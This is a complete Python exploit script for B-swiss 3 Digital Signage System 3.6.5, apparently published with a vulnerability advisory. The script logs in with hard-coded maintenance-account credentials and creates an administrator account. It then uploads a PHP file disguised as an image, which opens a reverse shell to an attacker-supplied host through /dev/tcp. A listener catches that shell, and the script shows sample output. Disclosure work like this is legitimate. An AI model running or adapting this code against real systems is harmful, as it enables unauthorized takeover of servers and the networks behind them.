B-swiss 3 Digital Signage System version 3.6.5 suffers from an authenticated arbitrary PHP code execution vulnerability. The vulnerability is caused due to the improper verification of uploaded files in index.php script thru the rec_poza POST parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file that will be stored in the /usr/users directory. Due to an undocumented and hidden maintenance account admin_m which has the highest privileges in the application, an attacker can use these hard-coded credentials to authenticate and use the vulnerable image upload functionality to execute code on the server.
b8122e7dc5d8a3a0549b1366c4226983#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
# 3.6.2
# 3.6.1
# 3.6.0
# 3.5.80
# 3.5.40
# 3.5.20
# 3.5.00
# 3.2.00
# 3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
# Linux 4.15.0-20-generic x86_64
# Linux 4.9.78-xxxx-std-ipv6-64
# Linux 4.7.0-040700-generic x86_64
# Linux 4.2.0-27-generic x86_64
# Linux 3.19.0-47-generic x86_64
# Linux 2.6.32-5-amd64 x86_64
# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
# macOS 10.13.5
# Microsoft Windows 7 Business Edition SP1 i586
# Apache/2.4.29 (Ubuntu)
# Apache/2.4.18 (Ubuntu)
# Apache/2.4.7 (Ubuntu)
# Apache/2.2.22 (Win64)
# Apache/2.4.18 (Ubuntu)
# Apache/2.2.16 (Debian)
# PHP/7.2.24-0ubuntu0.18.04.6
# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
# PHP/5.6.31
# PHP/5.6.30-10+deb.sury.org~xenial+2
# PHP/5.5.9-1ubuntu4.17
# PHP/5.5.9-1ubuntu4.14
# PHP/5.3.10
# PHP/5.3.13
# PHP/5.3.3-7+squeeze16
# PHP/5.3.3-7+squeeze17
# MySQL/5.5.49
# MySQL/5.5.47
# MySQL/5.5.40
# MySQL/5.5.30
# MySQL/5.1.66
# MySQL/5.1.49
# MySQL/5.0.77
# MySQL/5.0.12-dev
# MySQL/5.0.11-dev
# MySQL/5.0.8-dev
# phpMyAdmin/3.5.7
# phpMyAdmin/3.4.10.1deb1
# phpMyAdmin/3.4.7
# phpMyAdmin/3.3.7deb7
# WampServer 3.2.0
# Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#
from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep# | 01 | 04 | #peels trompi emit morf
import urllib.request# | | | | #tseuqer.billru tropmi
import urllib.parse# | | | | #esrap.billru tropmi
import telnetlib# | | | #biltenlet tropmi
import threading# | | | | #gnidaerht tropmi
import requests# | | | | #stseuqer tropmi
import socket# | | o | #tekcos tropmi
import sys,re# | | | #er,sys tropmi
############## #-----------------+-----------------# ##############
############### oOo ###############
################ | ################
#################### Y ####################
############################ _ ############################
###############################################################################################
class Sign:
def __init__(self):
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
self.password = b"\x44\x50\x36\x25\x57\x33\x64"
self.agent = "SignageBot/1.02"
self.fileid = "251"
self.payload = None
self.answer = False
self.params = None
self.rhost = None
self.lhost = None
self.lport = None
self.send = None
def env(self):
if len(sys.argv) != 4:
self.usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def usage(self):
self.roger()
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
exit(0)
def roger(self):
waddup = """
____________________
/ \\
! B-swiss 3 !
! RCE !
\____________________/
! !
! !
L_ !
/ _)!
/ /__L
____________/ (____)
(____)
____________ (____)
\_(____)
! !
! !
\__/
"""
print(waddup)
def test(self):
print("[*] Checking target...")
try:
r = requests.get(self.rhost)
response = r.text
if not "B-swiss" in response:
print("[!] Not a b-swiss system")
exit(0)
if "B-swiss" in response:
print("[*] Good to go!")
next
else:
exit(-251)
except Exception as e:
print("[!] Ney ney: {msg}".format(msg=e))
exit(-1)
def login(self):
token = ""
cj = CookieJar()
self.params = {"locator" : "visitor.ProcessLogin",
"username" : self.username,
"password" : self.password,
"x" : "0",
"y" : "0"}
damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
damato.addheaders.pop()
damato.addheaders.append(("User-Agent", self.agent))
try:
print("[*] Getting backdoor session...")
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
for cookie in cj:
token = cookie.value
print("[*] Got master backdoor cookie: "+token)
except urllib.request.URLError as e:
print("[!] Connection error: {}".format(e.reason))
return token
def upload(self):
j = "\r\n"
self.cookies = {"PNU_RAD_LIB" : self.rtoken}
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----j",
"User-Agent" : self.agent,
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9",
"Connection" : "close"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
print("[*] Adding GUI credentials: test:123456")
# rec_adminlevel values:
# ----------------------
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
# 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
# 8 - Other |
# |
self.send = "------j{}Content-Disposition: form-data; ".format(j)# |
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# |
self.send += "name=\"rec_email\"{}[email protected]{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
print("[*] Executing and deleting stager file")
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
sleep(1)
self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
if self.answer[0] == "y" or self.answer[0] == "Y":
print("[*] Removing...")
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
if self.answer[0] == "n" or self.answer[0] == "N":
print("[*] Cool!")
print("[*] t00t!")
exit(-1)
def razmisluju(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.phone)
konac.start()
sleep(1)
self.upload()
def fish(self):
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
response = r.text
print("[*] Checking for previous attempts...")
if not ".php" in response:
print("[*] All good.")
elif "251.php" in response:
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))
def phone(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] No outgoing calls :( ({msg})".format(msg=p))
print("[+] Check your port mappings or increase timeout")
s.close()
exit(0)
break
print("[*] You got shell!")
telnetus.interact()
conn.close()
def main(self):
self.env()
self.test()
self.fish()
self.rtoken = self.login()
self.razmisluju()
if __name__ == '__main__':
Sign().main()